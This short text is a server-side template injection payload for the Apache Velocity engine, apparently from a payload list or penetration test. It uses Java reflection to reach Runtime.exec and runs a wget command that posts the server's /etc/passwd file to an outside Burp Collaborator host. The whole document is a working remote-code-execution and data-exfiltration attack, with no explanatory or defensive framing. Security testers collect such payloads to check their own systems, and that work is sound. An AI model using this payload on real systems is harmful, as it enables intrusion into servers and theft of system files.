#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec('wget --post-file /etc/passwd http://lf47khqxdhxkz1fv43lqf1wwdnjm7b.burpcollaborator.net/rcetest?a=a')
